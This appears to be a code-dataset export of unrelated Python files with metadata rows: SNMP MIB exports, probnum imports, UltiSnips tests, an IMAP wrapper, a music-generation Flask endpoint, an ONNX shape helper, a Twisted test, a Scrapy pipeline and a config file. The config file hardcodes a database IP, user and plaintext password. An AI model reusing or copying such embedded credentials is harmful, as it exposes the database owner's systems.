mibBuilder.exportSymbols("BAY-STACK-MIB", bayStackMib=bayStackMib, bayStackUnitConfigIndex=bayStackUnitConfigIndex, bayStackConfigStackErrorNotificationEnabled=bayStackConfigStackErrorNotificationEnabled, PYSNMP_MODULE_ID=bayStackMib, bayStackConfigStackRetryCount=bayStackConfigStackRetryCount, bayStackConfigStackErrorNotificationInterval=bayStackConfigStackErrorNotificationInterval, bayStackUnitConfigRearPortOperMode=bayStackUnitConfigRearPortOperMode, bayStackUnitConfigEntry=bayStackUnitConfigEntry, bayStackConfigStackRebootUnitOnFailure=bayStackConfigStackRebootUnitOnFailure, bayStackObjects=bayStackObjects, bayStackUnitConfigRearPortAdminMode=bayStackUnitConfigRearPortAdminMode, bayStackConfig=bayStackConfig, bayStackUnitConfigTable=bayStackUnitConfigTable, bayStackConfigExpectedStackSize=bayStackConfigExpectedStackSize)
| 130.904762 | 836 | 0.790833 | 556 | 5,498 | 7.816547 | 0.269784 | 0.006903 | 0.008974 | 0.011965 | 0.35826 | 0.254717 | 0.230787 | 0.230787 | 0.230787 | 0.199724 | 0 | 0.071876 | 0.071299 | 5,498 | 41 | 837 | 134.097561 | 0.779279 | 0.058203 | 0 | 0 | 0 | 0 | 0.159799 | 0.012962 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.205882 | 0 | 0.205882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fe6702a87b9963548f65391cbbfe3151ca980e8 | 1,606 | py | Python | src/probnum/random_variables/__init__.py | admdev8/probnum | 792b6299bac247cf8b1b5056756f0f078855d83a | [
"MIT"
] | null | null | null | src/probnum/random_variables/__init__.py | admdev8/probnum | 792b6299bac247cf8b1b5056756f0f078855d83a | [
"MIT"
] | 2 | 2020-12-28T19:37:16.000Z | 2020-12-28T19:37:31.000Z | src/probnum/random_variables/__init__.py | admdev8/probnum | 792b6299bac247cf8b1b5056756f0f078855d83a | [
"MIT"
] | null | null | null | """
This package implements random variables. Random variables are the primary in- and
outputs of probabilistic numerical methods. A generic signature of such methods looks
like this:
.. highlight:: python
.. code-block:: python
randvar_out, info = probnum_method(problem, randvar_in, **kwargs)
"""
from ._dirac import Dirac
from ._normal import Normal
from ._random_variable import (
ContinuousRandomVariable,
DiscreteRandomVariable,
RandomVariable,
)
from ._scipy_stats import (
WrappedSciPyContinuousRandomVariable,
WrappedSciPyDiscreteRandomVariable,
WrappedSciPyRandomVariable,
)
from ._utils import asrandvar
# Public classes and functions. Order is reflected in documentation.
__all__ = [
"asrandvar",
"RandomVariable",
"DiscreteRandomVariable",
"ContinuousRandomVariable",
"Dirac",
"Normal",
"WrappedSciPyRandomVariable",
"WrappedSciPyDiscreteRandomVariable",
"WrappedSciPyContinuousRandomVariable",
]
# Set correct module paths. Corrects links and module paths in documentation.
RandomVariable.__module__ = "probnum.random_variables"
DiscreteRandomVariable.__module__ = "probnum.random_variables"
ContinuousRandomVariable.__module__ = "probnum.random_variables"
WrappedSciPyRandomVariable.__module__ = "probnum.random_variables"
WrappedSciPyDiscreteRandomVariable.__module__ = "probnum.random_variables"
WrappedSciPyContinuousRandomVariable.__module__ = "probnum.random_variables"
Dirac.__module__ = "probnum.random_variables"
Normal.__module__ = "probnum.random_variables"
asrandvar.__module__ = "probnum.random_variables"
| 30.301887 | 85 | 0.797011 | 141 | 1,606 | 8.659574 | 0.432624 | 0.135135 | 0.140049 | 0.206388 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126401 | 1,606 | 52 | 86 | 30.884615 | 0.870278 | 0.273973 | 0 | 0 | 0 | 0 | 0.3391 | 0.309689 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.151515 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fea6ea2847af9fb33f26ea132b770aa2ffca311 | 9,206 | py | Python | dot_vim/plugged/ultisnips/test/test_SnippetOptions.py | gabefgonc/san-francisco-rice-dotfiles | 60ff3539f34ecfff6d7bce895497e2a3805910d4 | [
"MIT"
] | 10 | 2020-07-21T21:59:54.000Z | 2021-07-19T11:01:47.000Z | dot_vim/plugged/ultisnips/test/test_SnippetOptions.py | gabefgonc/san-francisco-rice-dotfiles | 60ff3539f34ecfff6d7bce895497e2a3805910d4 | [
"MIT"
] | null | null | null | dot_vim/plugged/ultisnips/test/test_SnippetOptions.py | gabefgonc/san-francisco-rice-dotfiles | 60ff3539f34ecfff6d7bce895497e2a3805910d4 | [
"MIT"
] | 1 | 2021-01-30T18:17:01.000Z | 2021-01-30T18:17:01.000Z | # encoding: utf-8
from test.vim_test_case import VimTestCase as _VimTest
from test.constant import *
from test.util import running_on_windows
class SnippetOptions_OnlyExpandWhenWSInFront_Expand(_VimTest):
snippets = ("test", "Expand me!", "", "b")
keys = "test" + EX
wanted = "Expand me!"
class SnippetOptions_OnlyExpandWhenWSInFront_Expand2(_VimTest):
snippets = ("test", "Expand me!", "", "b")
keys = " test" + EX
wanted = " Expand me!"
class SnippetOptions_OnlyExpandWhenWSInFront_DontExpand(_VimTest):
snippets = ("test", "Expand me!", "", "b")
keys = "a test" + EX
wanted = "a test" + EX
class SnippetOptions_OnlyExpandWhenWSInFront_OneWithOneWO(_VimTest):
snippets = (("test", "Expand me!", "", "b"), ("test", "not at beginning", "", ""))
keys = "a test" + EX
wanted = "a not at beginning"
class SnippetOptions_OnlyExpandWhenWSInFront_OneWithOneWOChoose(_VimTest):
snippets = (("test", "Expand me!", "", "b"), ("test", "not at beginning", "", ""))
keys = " test" + EX + "1\n"
wanted = " Expand me!"
class SnippetOptions_ExpandInwordSnippets_SimpleExpand(_VimTest):
snippets = (("test", "Expand me!", "", "i"),)
keys = "atest" + EX
wanted = "aExpand me!"
class SnippetOptions_ExpandInwordSnippets_ExpandSingle(_VimTest):
snippets = (("test", "Expand me!", "", "i"),)
keys = "test" + EX
wanted = "Expand me!"
class SnippetOptions_ExpandInwordSnippetsWithOtherChars_Expand(_VimTest):
snippets = (("test", "Expand me!", "", "i"),)
keys = "$test" + EX
wanted = "$Expand me!"
class SnippetOptions_ExpandInwordSnippetsWithOtherChars_Expand2(_VimTest):
snippets = (("test", "Expand me!", "", "i"),)
keys = "-test" + EX
wanted = "-Expand me!"
class SnippetOptions_ExpandInwordSnippetsWithOtherChars_Expand3(_VimTest):
skip_if = lambda self: running_on_windows()
snippets = (("test", "Expand me!", "", "i"),)
keys = "ßßtest" + EX
wanted = "ßßExpand me!"
class _SnippetOptions_ExpandWordSnippets(_VimTest):
snippets = (("test", "Expand me!", "", "w"),)
class SnippetOptions_ExpandWordSnippets_NormalExpand(
_SnippetOptions_ExpandWordSnippets
):
keys = "test" + EX
wanted = "Expand me!"
class SnippetOptions_ExpandWordSnippets_NoExpand(_SnippetOptions_ExpandWordSnippets):
keys = "atest" + EX
wanted = "atest" + EX
class SnippetOptions_ExpandWordSnippets_ExpandSuffix(
_SnippetOptions_ExpandWordSnippets
):
keys = "a-test" + EX
wanted = "a-Expand me!"
class SnippetOptions_ExpandWordSnippets_ExpandSuffix2(
_SnippetOptions_ExpandWordSnippets
):
keys = "a(test" + EX
wanted = "a(Expand me!"
class SnippetOptions_ExpandWordSnippets_ExpandSuffix3(
_SnippetOptions_ExpandWordSnippets
):
keys = "[[test" + EX
wanted = "[[Expand me!"
class _No_Tab_Expand(_VimTest):
snippets = ("test", "\t\tExpand\tme!\t", "", "t")
class No_Tab_Expand_Simple(_No_Tab_Expand):
keys = "test" + EX
wanted = "\t\tExpand\tme!\t"
class No_Tab_Expand_Leading_Spaces(_No_Tab_Expand):
keys = " test" + EX
wanted = " \t\tExpand\tme!\t"
class No_Tab_Expand_Leading_Tabs(_No_Tab_Expand):
keys = "\ttest" + EX
wanted = "\t\t\tExpand\tme!\t"
class No_Tab_Expand_No_TS(_No_Tab_Expand):
def _extra_vim_config(self, vim_config):
vim_config.append("set sw=3")
vim_config.append("set sts=3")
keys = "test" + EX
wanted = "\t\tExpand\tme!\t"
class No_Tab_Expand_ET(_No_Tab_Expand):
def _extra_vim_config(self, vim_config):
vim_config.append("set sw=3")
vim_config.append("set expandtab")
keys = "test" + EX
wanted = "\t\tExpand\tme!\t"
class No_Tab_Expand_ET_Leading_Spaces(_No_Tab_Expand):
def _extra_vim_config(self, vim_config):
vim_config.append("set sw=3")
vim_config.append("set expandtab")
keys = " test" + EX
wanted = " \t\tExpand\tme!\t"
class No_Tab_Expand_ET_SW(_No_Tab_Expand):
def _extra_vim_config(self, vim_config):
vim_config.append("set sw=8")
vim_config.append("set expandtab")
keys = "test" + EX
wanted = "\t\tExpand\tme!\t"
class No_Tab_Expand_ET_SW_TS(_No_Tab_Expand):
def _extra_vim_config(self, vim_config):
vim_config.append("set sw=3")
vim_config.append("set sts=3")
vim_config.append("set ts=3")
vim_config.append("set expandtab")
keys = "test" + EX
wanted = "\t\tExpand\tme!\t"
class _TabExpand_RealWorld:
snippets = (
"hi",
r"""hi
`!p snip.rv="i1\n"
snip.rv += snip.mkline("i1\n")
snip.shift(1)
snip.rv += snip.mkline("i2\n")
snip.unshift(2)
snip.rv += snip.mkline("i0\n")
snip.shift(3)
snip.rv += snip.mkline("i3")`
snip.rv = repr(snip.rv)
End""",
)
class No_Tab_Expand_RealWorld(_TabExpand_RealWorld, _VimTest):
def _extra_vim_config(self, vim_config):
vim_config.append("set noexpandtab")
keys = "\t\thi" + EX
wanted = """\t\thi
\t\ti1
\t\ti1
\t\t\ti2
\ti0
\t\t\t\ti3
\t\tsnip.rv = repr(snip.rv)
\t\tEnd"""
class SnippetOptions_Regex_Expand(_VimTest):
snippets = ("(test)", "Expand me!", "", "r")
keys = "test" + EX
wanted = "Expand me!"
class SnippetOptions_Regex_WithSpace(_VimTest):
snippets = ("test ", "Expand me!", "", "r")
keys = "test " + EX
wanted = "Expand me!"
class SnippetOptions_Regex_Multiple(_VimTest):
snippets = ("(test *)+", "Expand me!", "", "r")
keys = "test test test" + EX
wanted = "Expand me!"
class _Regex_Self(_VimTest):
snippets = ("((?<=\W)|^)(\.)", "self.", "", "r")
class SnippetOptions_Regex_Self_Start(_Regex_Self):
keys = "." + EX
wanted = "self."
class SnippetOptions_Regex_Self_Space(_Regex_Self):
keys = " ." + EX
wanted = " self."
class SnippetOptions_Regex_Self_TextAfter(_Regex_Self):
keys = " .a" + EX
wanted = " .a" + EX
class SnippetOptions_Regex_Self_TextBefore(_Regex_Self):
keys = "a." + EX
wanted = "a." + EX
class SnippetOptions_Regex_PythonBlockMatch(_VimTest):
snippets = (
r"([abc]+)([def]+)",
r"""`!p m = match
snip.rv += m.group(2)
snip.rv += m.group(1)
`""",
"",
"r",
)
keys = "test cabfed" + EX
wanted = "test fedcab"
class SnippetOptions_Regex_PythonBlockNoMatch(_VimTest):
snippets = (r"cabfed", r"""`!p snip.rv = match or "No match"`""")
keys = "test cabfed" + EX
wanted = "test No match"
# Tests for Bug #691575
class SnippetOptions_Regex_SameLine_Long_End(_VimTest):
snippets = ("(test.*)", "Expand me!", "", "r")
keys = "test test abc" + EX
wanted = "Expand me!"
class SnippetOptions_Regex_SameLine_Long_Start(_VimTest):
snippets = ("(.*test)", "Expand me!", "", "r")
keys = "abc test test" + EX
wanted = "Expand me!"
class SnippetOptions_Regex_SameLine_Simple(_VimTest):
snippets = ("(test)", "Expand me!", "", "r")
keys = "abc test test" + EX
wanted = "abc test Expand me!"
class MultiWordSnippet_Simple(_VimTest):
snippets = ("test me", "Expand me!")
keys = "test me" + EX
wanted = "Expand me!"
class MultiWord_SnippetOptions_OnlyExpandWhenWSInFront_Expand(_VimTest):
snippets = ("test it", "Expand me!", "", "b")
keys = "test it" + EX
wanted = "Expand me!"
class MultiWord_SnippetOptions_OnlyExpandWhenWSInFront_Expand2(_VimTest):
snippets = ("test it", "Expand me!", "", "b")
keys = " test it" + EX
wanted = " Expand me!"
class MultiWord_SnippetOptions_OnlyExpandWhenWSInFront_DontExpand(_VimTest):
snippets = ("test it", "Expand me!", "", "b")
keys = "a test it" + EX
wanted = "a test it" + EX
class MultiWord_SnippetOptions_OnlyExpandWhenWSInFront_OneWithOneWO(_VimTest):
snippets = (
("test it", "Expand me!", "", "b"),
("test it", "not at beginning", "", ""),
)
keys = "a test it" + EX
wanted = "a not at beginning"
class MultiWord_SnippetOptions_OnlyExpandWhenWSInFront_OneWithOneWOChoose(_VimTest):
snippets = (
("test it", "Expand me!", "", "b"),
("test it", "not at beginning", "", ""),
)
keys = " test it" + EX + "1\n"
wanted = " Expand me!"
class MultiWord_SnippetOptions_ExpandInwordSnippets_SimpleExpand(_VimTest):
snippets = (("test it", "Expand me!", "", "i"),)
keys = "atest it" + EX
wanted = "aExpand me!"
class MultiWord_SnippetOptions_ExpandInwordSnippets_ExpandSingle(_VimTest):
snippets = (("test it", "Expand me!", "", "i"),)
keys = "test it" + EX
wanted = "Expand me!"
class _MultiWord_SnippetOptions_ExpandWordSnippets(_VimTest):
snippets = (("test it", "Expand me!", "", "w"),)
class MultiWord_SnippetOptions_ExpandWordSnippets_NormalExpand(
_MultiWord_SnippetOptions_ExpandWordSnippets
):
keys = "test it" + EX
wanted = "Expand me!"
class MultiWord_SnippetOptions_ExpandWordSnippets_NoExpand(
_MultiWord_SnippetOptions_ExpandWordSnippets
):
keys = "atest it" + EX
wanted = "atest it" + EX
class MultiWord_SnippetOptions_ExpandWordSnippets_ExpandSuffix(
_MultiWord_SnippetOptions_ExpandWordSnippets
):
keys = "a-test it" + EX
wanted = "a-Expand me!"
| 25.360882 | 86 | 0.647078 | 1,079 | 9,206 | 5.270621 | 0.118628 | 0.068929 | 0.086865 | 0.063478 | 0.754 | 0.691929 | 0.581502 | 0.540355 | 0.488483 | 0.452963 | 0 | 0.005164 | 0.20063 | 9,206 | 362 | 87 | 25.430939 | 0.767631 | 0.00391 | 0 | 0.531915 | 0 | 0 | 0.190224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025532 | false | 0 | 0.012766 | 0 | 0.795745 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6ff236eea364203b4294e15e6410629f2aeb3886 | 3,143 | py | Python | imap_wrapper.py | tbrownaw/rss-imap | 41d930d778017a9d60feed1688f9f2c7a94b94a6 | [
"MIT"
] | 2 | 2016-09-28T19:44:53.000Z | 2021-09-17T11:36:24.000Z | imap_wrapper.py | tbrownaw/rss-imap | 41d930d778017a9d60feed1688f9f2c7a94b94a6 | [
"MIT"
] | null | null | null | imap_wrapper.py | tbrownaw/rss-imap | 41d930d778017a9d60feed1688f9f2c7a94b94a6 | [
"MIT"
] | null | null | null | import email
import logging
import re
from imapclient import IMAPClient
class IMAPError(IOError):
pass
class ImapWrapper:
"""A wrapper around imaplib, since that's a bit
lower-level than I'd prefer to work with."""
#This regex is:
# list of flags in parens
# quoted delimiter
# possible-quoted folder name
list_matcher = re.compile(r'^\(([^()]*)\) "([^"]*)" (([^" ]+)|"([^"]*)")$')
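    # Illustrative example (sample line not taken from the original source): a raw
    # LIST response such as
    #   (\HasNoChildren) "/" "INBOX.Sent"
    # would match with flags '\HasNoChildren', delimiter '/' and a quoted folder name.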
def __init__(self, host, user, pw, **kwargs):
"""kwargs: Paassed through to IMAPClient"""
self.M = IMAPClient(host, **kwargs)
self.M.login(user, pw)
self._selected_folder = None
self._update_folders()
def logout(self):
self.M.logout()
def _update_folders(self):
listing = self.M.list_folders()
self.folder_list = [name for (flags, delim, name) in listing]
def ensure_folder(self, name):
"""Return True if the folder was created, False if it already existed."""
l = logging.getLogger(__name__)
search_name = name[:-1] if name.endswith('/') else name
if not any(n == search_name for n in self.folder_list):
rslt = self.M.create_folder(name)
l.info(f"Folder create result: {rslt}")
self.folder_list.append(search_name)
return True
else:
return False
def fetch_messages(self, folder, *search_args):
l = logging.getLogger(__name__)
ret = []
self.select_folder(folder)
message_ids = self.M.search(search_args)
message_dict = self.M.fetch(message_ids, 'RFC822')
for msg in message_dict.values():
l.debug("Got message: %s", msg)
msg = email.message_from_string(msg[b'RFC822'].decode('UTF-8'))
ret.append(msg)
return ret
def check_folder_for_message_ids(self, folder, msgids):
self.select_folder(folder)
search_ids = []
for msgid in msgids:
if len(search_ids) > 0:
search_ids.insert(0, 'OR')
search_ids.append(['HEADER', 'Message-Id', msgid])
message_numbers = self.M.search(['NOT', 'DELETED', search_ids])
message_envelopes = self.M.fetch(message_numbers, 'ENVELOPE')
have_ids = []
for msgdata in message_envelopes.values():
envelope = msgdata[b'ENVELOPE']
have_ids.append(envelope.message_id)
return have_ids
def append(self, folder_name, email):
response = self.M.append(folder_name, str(email).encode('utf-8'))
logging.getLogger(__name__).debug("Append response: %s", response)
# FIXME sets the context folder
def select_folder(self, name):
if self._selected_folder == name:
return
dtl = self.M.select_folder(name)
logging.getLogger(__name__).debug("select_folder = %s", dtl)
self._selected_folder = name
def create_subscribe_folder(self, name):
created = self.ensure_folder(name)
if created:
res = self.M.subscribe_folder(name)
logging.getLogger(__name__).debug("Subscribe result: %s", res)
| 34.538462 | 81 | 0.610563 | 392 | 3,143 | 4.688776 | 0.334184 | 0.032644 | 0.054407 | 0.040805 | 0.038085 | 0.038085 | 0 | 0 | 0 | 0 | 0 | 0.00477 | 0.266306 | 3,143 | 90 | 82 | 34.922222 | 0.792281 | 0.097359 | 0 | 0.059701 | 0 | 0 | 0.075391 | 0 | 0 | 0 | 0 | 0.011111 | 0 | 1 | 0.134328 | false | 0.014925 | 0.059701 | 0 | 0.313433 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ff60de2cd7ad626ba0327a1b10d9c7e29a27101 | 3,150 | py | Python | serve/api/predict.py | HalleyYoung/musicautobot | 075afba70a57ebacfcd8d2bf9dc178a93c05a116 | [
"MIT"
] | 402 | 2019-07-31T00:37:10.000Z | 2022-03-27T22:21:29.000Z | serve/api/predict.py | HalleyYoung/musicautobot | 075afba70a57ebacfcd8d2bf9dc178a93c05a116 | [
"MIT"
] | 26 | 2019-08-20T13:44:30.000Z | 2022-01-27T10:42:28.000Z | serve/api/predict.py | HalleyYoung/musicautobot | 075afba70a57ebacfcd8d2bf9dc178a93c05a116 | [
"MIT"
] | 81 | 2019-08-14T06:55:55.000Z | 2022-03-19T09:49:15.000Z | import sys
from . import app
sys.path.append(str(app.config['LIB_PATH']))
from musicautobot.music_transformer import *
from musicautobot.config import *
from flask import Response, send_from_directory, send_file, request, jsonify
from .save import to_s3
import torch
import traceback
torch.set_num_threads(4)
data = load_data(app.config['DATA_PATH'], app.config['DATA_SAVE_NAME'], num_workers=1)
learn = music_model_learner(data, pretrained_path=app.config['MUSIC_MODEL_PATH'])
if torch.cuda.is_available(): learn.model.cuda()
# learn.to_fp16(loss_scale=512) # fp16 not supported for cpu - https://github.com/pytorch/pytorch/issues/17699
@app.route('/predict/midi', methods=['POST'])
def predict_midi():
args = request.form.to_dict()
midi = request.files['midi'].read()
print('THE ARGS PASSED:', args)
bpm = float(args['bpm']) # (AS) TODO: get bpm from midi file instead
temperatures = (float(args.get('noteTemp', 1.2)), float(args.get('durationTemp', 0.8)))
n_words = int(args.get('nSteps', 200))
seed_len = int(args.get('seedLen', 12))
# debugging 1 - send exact midi back
# with open('/tmp/test.mid', 'wb') as f:
# f.write(midi)
# return send_from_directory('/tmp', 'test.mid', mimetype='audio/midi')
# debugging 2 - test music21 conversion
# stream = file2stream(midi) # 1.
# debugging 3 - test npenc conversion
# seed_np = midi2npenc(midi) # music21 can handle bytes directly
# stream = npenc2stream(seed_np, bpm=bpm)
# debugging 4 - midi in, convert, midi out
# stream = file2stream(midi) # 1.
# midi_in = Path(stream.write("musicxml"))
# print('Midi in:', midi_in)
# stream_sep = separate_melody_chord(stream)
# midi_out = Path(stream_sep.write("midi"))
# print('Midi out:', midi_out)
# s3_id = to_s3(midi_out, args)
# result = {
# 'result': s3_id
# }
# return jsonify(result)
# Main logic
try:
full = predict_from_midi(learn, midi=midi, n_words=n_words, seed_len=seed_len, temperatures=temperatures)
stream = separate_melody_chord(full.to_stream(bpm=bpm))
midi_out = Path(stream.write("midi"))
print('Wrote to temporary file:', midi_out)
except Exception as e:
traceback.print_exc()
return jsonify({'error': f'Failed to predict: {e}'})
s3_id = to_s3(midi_out, args)
result = {
'result': s3_id
}
return jsonify(result)
# return send_from_directory(midi_out.parent, midi_out.name, mimetype='audio/midi')
# @app.route('/midi/song/<path:sid>')
# def get_song_midi(sid):
# return send_from_directory(file_path/data_dir, htlist[sid]['midi'], mimetype='audio/midi')
@app.route('/midi/convert', methods=['POST'])
def convert_midi():
args = request.form.to_dict()
if 'midi' in request.files:
midi = request.files['midi'].read()
elif 'midi_path'in args:
midi = args['midi_path']
stream = file2stream(midi) # 1.
# stream = file2stream(midi).chordify() # 1.
stream_out = Path(stream.write('musicxml'))
return send_from_directory(stream_out.parent, stream_out.name, mimetype='xml')
| 35 | 113 | 0.672381 | 442 | 3,150 | 4.61991 | 0.332579 | 0.03428 | 0.041626 | 0.045054 | 0.129285 | 0.105779 | 0.052889 | 0.052889 | 0.052889 | 0.052889 | 0 | 0.018626 | 0.181905 | 3,150 | 89 | 114 | 35.393258 | 0.773768 | 0.365714 | 0 | 0.088889 | 0 | 0 | 0.119837 | 0 | 0 | 0 | 0 | 0.011236 | 0 | 1 | 0.044444 | false | 0.022222 | 0.177778 | 0 | 0.288889 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6ffc37d2645887ce4dd7940f03465b3689f39751 | 458 | py | Python | nngen/onnx/shape.py | RyusukeYamano/nngen | 9ed1f7fb83908794aa94d70287d89545d45fe875 | [
"Apache-2.0"
] | 207 | 2019-11-12T11:42:25.000Z | 2022-03-20T20:32:17.000Z | nngen/onnx/shape.py | RyusukeYamano/nngen | 9ed1f7fb83908794aa94d70287d89545d45fe875 | [
"Apache-2.0"
] | 31 | 2019-11-25T07:33:30.000Z | 2022-03-17T12:34:34.000Z | nngen/onnx/shape.py | RyusukeYamano/nngen | 9ed1f7fb83908794aa94d70287d89545d45fe875 | [
"Apache-2.0"
] | 29 | 2019-11-07T02:25:48.000Z | 2022-03-12T16:22:57.000Z | from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
def Shape(visitor, node):
input = visitor.visit(node.input[0])
shape = input.shape
if (input.get_layout() is not None and input.get_onnx_layout() is not None and
input.get_layout() != input.get_onnx_layout()):
shape = [shape[input.get_layout().index(l)] for l in input.get_onnx_layout()]
return tuple(shape)
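# Illustrative sketch (example values, not part of the original module): for a value
# stored with layout ('N', 'H', 'W', 'C') whose ONNX layout is ('N', 'C', 'H', 'W'),
# a stored shape of (1, 224, 224, 3) is reported back as (1, 3, 224, 224).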
| 28.625 | 85 | 0.713974 | 67 | 458 | 4.537313 | 0.41791 | 0.157895 | 0.157895 | 0.177632 | 0.171053 | 0.171053 | 0.171053 | 0 | 0 | 0 | 0 | 0.002681 | 0.18559 | 458 | 15 | 86 | 30.533333 | 0.812332 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.5 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
b502452c7fbc49bc12b35532d369cf96f4db27dd | 851 | py | Python | twisted/test/stdio_test_write.py | engdan77/otis_app | 6c6ea8da47d580e91a794663338572cf2a7368b6 | [
"MIT"
] | null | null | null | twisted/test/stdio_test_write.py | engdan77/otis_app | 6c6ea8da47d580e91a794663338572cf2a7368b6 | [
"MIT"
] | 1 | 2022-03-04T17:40:22.000Z | 2022-03-04T17:40:22.000Z | twisted/test/stdio_test_write.py | cpdean/twisted | e502df17e0704de42dc38b6e171ebbc7daf52c8a | [
"Unlicense",
"MIT"
] | null | null | null | # -*- test-case-name: twisted.test.test_stdio.StandardInputOutputTests.test_write -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Main program for the child process run by
L{twisted.test.test_stdio.StandardInputOutputTests.test_write} to test that
ITransport.write() works for process transports.
"""
__import__('_preamble')
import sys
from twisted.internet import stdio, protocol
from twisted.python import reflect
class WriteChild(protocol.Protocol):
def connectionMade(self):
for ch in 'ok!':
self.transport.write(ch)
self.transport.loseConnection()
def connectionLost(self, reason):
reactor.stop()
if __name__ == '__main__':
reflect.namedAny(sys.argv[1]).install()
from twisted.internet import reactor
stdio.StandardIO(WriteChild())
reactor.run()
| 25.787879 | 85 | 0.72738 | 102 | 851 | 5.901961 | 0.54902 | 0.054817 | 0.049834 | 0.066445 | 0.17608 | 0.17608 | 0.17608 | 0 | 0 | 0 | 0 | 0.001406 | 0.164512 | 851 | 32 | 86 | 26.59375 | 0.845288 | 0.374853 | 0 | 0 | 0 | 0 | 0.038314 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.3125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
b50af19fbfd3dbcdc0b721d01520bacb09232597 | 256 | py | Python | web.backend/config.py | Forevka/YTDownloader | fff92bfc13b70843472ec6cce13ed6609d89433a | [
"MIT"
] | 1 | 2020-10-27T05:31:51.000Z | 2020-10-27T05:31:51.000Z | web.backend/config.py | Forevka/YTDownloader | fff92bfc13b70843472ec6cce13ed6609d89433a | [
"MIT"
] | null | null | null | web.backend/config.py | Forevka/YTDownloader | fff92bfc13b70843472ec6cce13ed6609d89433a | [
"MIT"
] | null | null | null | host = "localhost"
port = 9999
dboptions = {
"host": "194.67.198.163",
"user": "postgres",
"password": "werdwerd2012",
"database": "zno_bot",
'migrate': True
}
API_PATH = '/api/'
API_VERSION = 'v1'
API_URL = API_PATH + API_VERSION
| 14.222222 | 32 | 0.597656 | 31 | 256 | 4.741935 | 0.741935 | 0.095238 | 0.136054 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 0.21875 | 256 | 17 | 33 | 15.058824 | 0.635 | 0 | 0 | 0 | 0 | 0 | 0.34375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
b50dc3fa0e49a34e31b885324c803f179d4c5bd2 | 746 | py | Python | UFOscrapy/UFOscrapy/pipelines.py | anaheino/Ufo-sightings-map | 64af02093f97737cbbdfd8af9e1aeb4d8aa8fcdc | [
"MIT"
] | null | null | null | UFOscrapy/UFOscrapy/pipelines.py | anaheino/Ufo-sightings-map | 64af02093f97737cbbdfd8af9e1aeb4d8aa8fcdc | [
"MIT"
] | null | null | null | UFOscrapy/UFOscrapy/pipelines.py | anaheino/Ufo-sightings-map | 64af02093f97737cbbdfd8af9e1aeb4d8aa8fcdc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from .parserules import parseAll
class UfoscrapyPipeline(object):
def process_item(self, item, spider):
"""
        Parse the fields into the correct format using regex and datetime.
"""
try:
item['loc'] = item['loc'][0]
except:
item['loc'] = ""
try:
item['shape'] = item['shape'][0]
except:
item['shape'] = ""
try:
item['state'] = item['state'][0]
except:
item['state'] = ""
try:
item['duration'] = item['duration'][0]
except:
item['duration'] = ""
parseAll(item)
return item
